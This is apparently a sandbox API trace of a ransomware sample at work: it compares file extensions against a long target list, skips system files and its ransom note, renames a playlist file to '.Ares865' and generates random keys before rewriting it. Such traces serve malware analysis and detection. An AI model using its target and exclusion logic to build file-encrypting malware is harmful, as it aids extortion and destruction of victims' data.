lstrcmpiW (lpString1="wpl", lpString2="adb") returned 1 [0065.167] lstrlenW (lpString="ade") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="ade") returned 1 [0065.167] lstrlenW (lpString="adf") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="adf") returned 1 [0065.167] lstrlenW (lpString="adn") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="adn") returned 1 [0065.167] lstrlenW (lpString="adp") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="adp") returned 1 [0065.167] lstrlenW (lpString="alf") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="alf") returned 1 [0065.167] lstrlenW (lpString="ask") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="ask") returned 1 [0065.167] lstrlenW (lpString="btr") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="btr") returned 1 [0065.167] lstrlenW (lpString="cat") returned 3 [0065.167] lstrcmpiW (lpString1="wpl", lpString2="cat") returned 1 [0065.168] lstrlenW (lpString="cdb") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="cdb") returned 1 [0065.168] lstrlenW (lpString="ckp") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="ckp") returned 1 [0065.168] lstrlenW (lpString="cma") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="cma") returned 1 [0065.168] lstrlenW (lpString="cpd") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="cpd") returned 1 [0065.168] lstrlenW (lpString="dacpac") returned 6 [0065.168] lstrcmpiW (lpString1="th.wpl", lpString2="dacpac") returned 1 [0065.168] lstrlenW (lpString="dad") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dad") returned 1 [0065.168] lstrlenW (lpString="dadiagrams") returned 10 [0065.168] lstrcmpiW (lpString1="_month.wpl", lpString2="dadiagrams") returned -1 [0065.168] lstrlenW (lpString="daschema") returned 8 [0065.168] lstrcmpiW (lpString1="onth.wpl", lpString2="daschema") returned 1 [0065.168] lstrlenW (lpString="db-journal") returned 10 [0065.168] lstrcmpiW (lpString1="_month.wpl", lpString2="db-journal") returned -1 [0065.168] lstrlenW (lpString="db-shm") returned 6 [0065.168] lstrcmpiW (lpString1="th.wpl", lpString2="db-shm") returned 1 [0065.168] lstrlenW (lpString="db-wal") returned 6 [0065.168] lstrcmpiW (lpString1="th.wpl", lpString2="db-wal") returned 1 [0065.168] lstrlenW (lpString="dbc") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dbc") returned 1 [0065.168] lstrlenW (lpString="dbs") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dbs") returned 1 [0065.168] lstrlenW (lpString="dbt") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dbt") returned 1 [0065.168] lstrlenW (lpString="dbv") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dbv") returned 1 [0065.168] lstrlenW (lpString="dbx") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dbx") returned 1 [0065.168] lstrlenW (lpString="dcb") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dcb") returned 1 [0065.168] lstrlenW (lpString="dct") returned 3 [0065.168] lstrcmpiW (lpString1="wpl", lpString2="dct") returned 1 [0065.168] lstrlenW (lpString="dcx") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dcx") returned 1 [0065.169] lstrlenW (lpString="ddl") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="ddl") returned 1 [0065.169] lstrlenW (lpString="dlis") returned 4 [0065.169] lstrcmpiW (lpString1=".wpl", lpString2="dlis") returned -1 [0065.169] lstrlenW (lpString="dp1") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dp1") returned 1 [0065.169] lstrlenW (lpString="dqy") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dqy") returned 1 [0065.169] lstrlenW (lpString="dsk") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dsk") returned 1 [0065.169] lstrlenW (lpString="dsn") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dsn") returned 1 [0065.169] lstrlenW (lpString="dtsx") returned 4 [0065.169] lstrcmpiW (lpString1=".wpl", lpString2="dtsx") returned -1 [0065.169] lstrlenW (lpString="dxl") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="dxl") returned 1 [0065.169] lstrlenW (lpString="eco") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="eco") returned 1 [0065.169] lstrlenW (lpString="ecx") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="ecx") returned 1 [0065.169] lstrlenW (lpString="edb") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="edb") returned 1 [0065.169] lstrlenW (lpString="epim") returned 4 [0065.169] lstrcmpiW (lpString1=".wpl", lpString2="epim") returned -1 [0065.169] lstrlenW (lpString="fcd") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="fcd") returned 1 [0065.169] lstrlenW (lpString="fdb") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="fdb") returned 1 [0065.169] lstrlenW (lpString="fic") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="fic") returned 1 [0065.169] lstrlenW (lpString="flexolibrary") returned 12 [0065.169] lstrcmpiW (lpString1="st_month.wpl", lpString2="flexolibrary") returned 1 [0065.169] lstrlenW (lpString="fm5") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="fm5") returned 1 [0065.169] lstrlenW (lpString="fmp") returned 3 [0065.169] lstrcmpiW (lpString1="wpl", lpString2="fmp") returned 1 [0065.169] lstrlenW (lpString="fmp12") returned 5 [0065.170] lstrcmpiW (lpString1="h.wpl", lpString2="fmp12") returned 1 [0065.170] lstrlenW (lpString="fmpsl") returned 5 [0065.170] lstrcmpiW (lpString1="h.wpl", lpString2="fmpsl") returned 1 [0065.170] lstrlenW (lpString="fol") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fol") returned 1 [0065.170] lstrlenW (lpString="fp3") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fp3") returned 1 [0065.170] lstrlenW (lpString="fp4") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fp4") returned 1 [0065.170] lstrlenW (lpString="fp5") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fp5") returned 1 [0065.170] lstrlenW (lpString="fp7") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fp7") returned 1 [0065.170] lstrlenW (lpString="fpt") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="fpt") returned 1 [0065.170] lstrlenW (lpString="frm") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="frm") returned 1 [0065.170] lstrlenW (lpString="gdb") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.170] lstrlenW (lpString="gdb") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="gdb") returned 1 [0065.170] lstrlenW (lpString="grdb") returned 4 [0065.170] lstrcmpiW (lpString1=".wpl", lpString2="grdb") returned -1 [0065.170] lstrlenW (lpString="gwi") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="gwi") returned 1 [0065.170] lstrlenW (lpString="hdb") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="hdb") returned 1 [0065.170] lstrlenW (lpString="his") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="his") returned 1 [0065.170] lstrlenW (lpString="ib") returned 2 [0065.170] lstrcmpiW (lpString1="pl", lpString2="ib") returned 1 [0065.170] lstrlenW (lpString="idb") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="idb") returned 1 [0065.170] lstrlenW (lpString="ihx") returned 3 [0065.170] lstrcmpiW (lpString1="wpl", lpString2="ihx") returned 1 [0065.170] lstrlenW (lpString="itdb") returned 4 [0065.171] lstrcmpiW (lpString1=".wpl", lpString2="itdb") returned -1 [0065.171] lstrlenW (lpString="itw") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="itw") returned 1 [0065.171] lstrlenW (lpString="jet") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="jet") returned 1 [0065.171] lstrlenW (lpString="jtx") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="jtx") returned 1 [0065.171] lstrlenW (lpString="kdb") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="kdb") returned 1 [0065.171] lstrlenW (lpString="kexi") returned 4 [0065.171] lstrcmpiW (lpString1=".wpl", lpString2="kexi") returned -1 [0065.171] lstrlenW (lpString="kexic") returned 5 [0065.171] lstrcmpiW (lpString1="h.wpl", lpString2="kexic") returned -1 [0065.171] lstrlenW (lpString="kexis") returned 5 [0065.171] lstrcmpiW (lpString1="h.wpl", lpString2="kexis") returned -1 [0065.171] lstrlenW (lpString="lgc") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="lgc") returned 1 [0065.171] lstrlenW (lpString="lwx") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="lwx") returned 1 [0065.171] lstrlenW (lpString="maf") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="maf") returned 1 [0065.171] lstrlenW (lpString="maq") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="maq") returned 1 [0065.171] lstrlenW (lpString="mar") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="mar") returned 1 [0065.171] lstrlenW (lpString="marshal") returned 7 [0065.171] lstrcmpiW (lpString1="nth.wpl", lpString2="marshal") returned 1 [0065.171] lstrlenW (lpString="mas") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="mas") returned 1 [0065.171] lstrlenW (lpString="mav") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="mav") returned 1 [0065.171] lstrlenW (lpString="maw") returned 3 [0065.171] lstrcmpiW (lpString1="wpl", lpString2="maw") returned 1 [0065.171] lstrlenW (lpString="mdbhtml") returned 7 [0065.171] lstrcmpiW (lpString1="nth.wpl", lpString2="mdbhtml") returned 1 [0065.171] lstrlenW (lpString="mdn") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mdn") returned 1 [0065.172] lstrlenW (lpString="mdt") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mdt") returned 1 [0065.172] lstrlenW (lpString="mfd") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mfd") returned 1 [0065.172] lstrlenW (lpString="mpd") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mpd") returned 1 [0065.172] lstrlenW (lpString="mrg") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mrg") returned 1 [0065.172] lstrlenW (lpString="mud") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mud") returned 1 [0065.172] lstrlenW (lpString="mwb") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="mwb") returned 1 [0065.172] lstrlenW (lpString="myd") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="myd") returned 1 [0065.172] lstrlenW (lpString="ndf") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="ndf") returned 1 [0065.172] lstrlenW (lpString="nnt") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="nnt") returned 1 [0065.172] lstrlenW (lpString="nrmlib") returned 6 [0065.172] lstrcmpiW (lpString1="th.wpl", lpString2="nrmlib") returned 1 [0065.172] lstrlenW (lpString="ns2") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="ns2") returned 1 [0065.172] lstrlenW (lpString="ns3") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="ns3") returned 1 [0065.172] lstrlenW (lpString="ns4") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="ns4") returned 1 [0065.172] lstrlenW (lpString="nsf") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="nsf") returned 1 [0065.172] lstrlenW (lpString="nv") returned 2 [0065.172] lstrcmpiW (lpString1="pl", lpString2="nv") returned 1 [0065.172] lstrlenW (lpString="nv2") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="nv2") returned 1 [0065.172] lstrlenW (lpString="nwdb") returned 4 [0065.172] lstrcmpiW (lpString1=".wpl", lpString2="nwdb") returned -1 [0065.172] lstrlenW (lpString="nyf") returned 3 [0065.172] lstrcmpiW (lpString1="wpl", lpString2="nyf") returned 1 [0065.173] lstrlenW (lpString="odb") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.173] lstrlenW (lpString="odb") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="odb") returned 1 [0065.173] lstrlenW (lpString="oqy") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="oqy") returned 1 [0065.173] lstrlenW (lpString="ora") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="ora") returned 1 [0065.173] lstrlenW (lpString="orx") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="orx") returned 1 [0065.173] lstrlenW (lpString="owc") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="owc") returned 1 [0065.173] lstrlenW (lpString="p96") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="p96") returned 1 [0065.173] lstrlenW (lpString="p97") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="p97") returned 1 [0065.173] lstrlenW (lpString="pan") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="pan") returned 1 [0065.173] lstrlenW (lpString="pdb") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="pdb") returned 1 [0065.173] lstrlenW (lpString="pdm") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="pdm") returned 1 [0065.173] lstrlenW (lpString="pnz") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="pnz") returned 1 [0065.173] lstrlenW (lpString="qry") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="qry") returned 1 [0065.173] lstrlenW (lpString="qvd") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="qvd") returned 1 [0065.173] lstrlenW (lpString="rbf") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="rbf") returned 1 [0065.173] lstrlenW (lpString="rctd") returned 4 [0065.173] lstrcmpiW (lpString1=".wpl", lpString2="rctd") returned -1 [0065.173] lstrlenW (lpString="rod") returned 3 [0065.173] lstrcmpiW (lpString1="wpl", lpString2="rod") returned 1 [0065.173] lstrlenW (lpString="rodx") returned 4 [0065.173] lstrcmpiW (lpString1=".wpl", lpString2="rodx") returned -1 [0065.173] lstrlenW (lpString="rpd") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="rpd") returned 1 [0065.174] lstrlenW (lpString="rsd") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="rsd") returned 1 [0065.174] lstrlenW (lpString="sas7bdat") returned 8 [0065.174] lstrcmpiW (lpString1="onth.wpl", lpString2="sas7bdat") returned -1 [0065.174] lstrlenW (lpString="sbf") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="sbf") returned 1 [0065.174] lstrlenW (lpString="scx") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="scx") returned 1 [0065.174] lstrlenW (lpString="sdb") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="sdb") returned 1 [0065.174] lstrlenW (lpString="sdc") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="sdc") returned 1 [0065.174] lstrlenW (lpString="sdf") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="sdf") returned 1 [0065.174] lstrlenW (lpString="sis") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="sis") returned 1 [0065.174] lstrlenW (lpString="spq") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="spq") returned 1 [0065.174] lstrlenW (lpString="te") returned 2 [0065.174] lstrcmpiW (lpString1="pl", lpString2="te") returned -1 [0065.174] lstrlenW (lpString="teacher") returned 7 [0065.174] lstrcmpiW (lpString1="nth.wpl", lpString2="teacher") returned -1 [0065.174] lstrlenW (lpString="tmd") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="tmd") returned 1 [0065.174] lstrlenW (lpString="tps") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="tps") returned 1 [0065.174] lstrlenW (lpString="trc") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.174] lstrlenW (lpString="trc") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="trc") returned 1 [0065.174] lstrlenW (lpString="trm") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="trm") returned 1 [0065.174] lstrlenW (lpString="udb") returned 3 [0065.174] lstrcmpiW (lpString1="wpl", lpString2="udb") returned 1 [0065.175] lstrlenW (lpString="udl") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="udl") returned 1 [0065.175] lstrlenW (lpString="usr") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="usr") returned 1 [0065.175] lstrlenW (lpString="v12") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="v12") returned 1 [0065.175] lstrlenW (lpString="vis") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="vis") returned 1 [0065.175] lstrlenW (lpString="vpd") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="vpd") returned 1 [0065.175] lstrlenW (lpString="vvv") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="vvv") returned 1 [0065.175] lstrlenW (lpString="wdb") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="wdb") returned 1 [0065.175] lstrlenW (lpString="wmdb") returned 4 [0065.175] lstrcmpiW (lpString1=".wpl", lpString2="wmdb") returned -1 [0065.175] lstrlenW (lpString="wrk") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="wrk") returned -1 [0065.175] lstrlenW (lpString="xdb") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="xdb") returned -1 [0065.175] lstrlenW (lpString="xld") returned 3 [0065.175] lstrcmpiW (lpString1="wpl", lpString2="xld") returned -1 [0065.175] lstrlenW (lpString="xmlff") returned 5 [0065.175] lstrcmpiW (lpString1="h.wpl", lpString2="xmlff") returned -1 [0065.175] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865") returned 137 [0065.175] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwFlags=0x1) returned 1 [0065.176] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.176] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=797) returned 1 [0065.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.177] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.178] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.178] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.178] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x620, lpName=0x0) returned 0x118 [0065.179] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x620) returned 0x190000 [0065.180] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.181] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.181] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.182] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.182] CloseHandle (hObject=0x118) returned 1 [0065.182] CloseHandle (hObject=0x164) returned 1 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.182] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf73e9a4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0065.182] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.182] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="aoldtz.exe") returned -1 [0065.182] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".") returned 1 [0065.182] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="..") returned 1 [0065.182] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="windows") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="bootmgr") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="temp") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="pagefile.sys") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="boot") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="ids.txt") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="ntuser.dat") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="perflogs") returned -1 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="MSBuild") returned -1 [0065.183] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0065.183] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 129 [0065.183] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="06_Pictures_rated_4_or_5_stars.wpl" | out: lpString1="06_Pictures_rated_4_or_5_stars.wpl") returned="06_Pictures_rated_4_or_5_stars.wpl" [0065.183] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0065.183] lstrlenW (lpString="Ares865") returned 7 [0065.183] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0065.183] lstrlenW (lpString=".dll") returned 4 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".dll") returned 1 [0065.183] lstrlenW (lpString=".lnk") returned 4 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".lnk") returned 1 [0065.183] lstrlenW (lpString=".ini") returned 4 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".ini") returned 1 [0065.183] lstrlenW (lpString=".sys") returned 4 [0065.183] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2=".sys") returned 1 [0065.183] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0065.183] lstrlenW (lpString="bak") returned 3 [0065.183] lstrcmpiW (lpString1="wpl", lpString2="bak") returned 1 [0065.183] lstrlenW (lpString="ba_") returned 3 [0065.183] lstrcmpiW (lpString1="wpl", lpString2="ba_") returned 1 [0065.183] lstrlenW (lpString="dbb") returned 3 [0065.183] lstrcmpiW (lpString1="wpl", lpString2="dbb") returned 1 [0065.183] lstrlenW (lpString="vmdk") returned 4 [0065.183] lstrcmpiW (lpString1=".wpl", lpString2="vmdk") returned -1 [0065.183] lstrlenW (lpString="rar") returned 3 [0065.183] lstrcmpiW (lpString1="wpl", lpString2="rar") returned 1 [0065.183] lstrlenW (lpString="zip") returned 3 [0065.183] lstrcmpiW (lpString1="wpl", lpString2="zip") returned -1 [0065.183] lstrlenW (lpString="tgz") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="tgz") returned 1 [0065.184] lstrlenW (lpString="vbox") returned 4 [0065.184] lstrcmpiW (lpString1=".wpl", lpString2="vbox") returned -1 [0065.184] lstrlenW (lpString="vdi") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="vdi") returned 1 [0065.184] lstrlenW (lpString="vhd") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="vhd") returned 1 [0065.184] lstrlenW (lpString="vhdx") returned 4 [0065.184] lstrcmpiW (lpString1=".wpl", lpString2="vhdx") returned -1 [0065.184] lstrlenW (lpString="avhd") returned 4 [0065.184] lstrcmpiW (lpString1=".wpl", lpString2="avhd") returned -1 [0065.184] lstrlenW (lpString="db") returned 2 [0065.184] lstrcmpiW (lpString1="pl", lpString2="db") returned 1 [0065.184] lstrlenW (lpString="db2") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="db2") returned 1 [0065.184] lstrlenW (lpString="db3") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="db3") returned 1 [0065.184] lstrlenW (lpString="dbf") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="dbf") returned 1 [0065.184] lstrlenW (lpString="mdf") returned 3 [0065.184] lstrcmpiW (lpString1="wpl", lpString2="mdf") returned 1 [0065.184] lstrlenW (lpString="mdb") returned 3 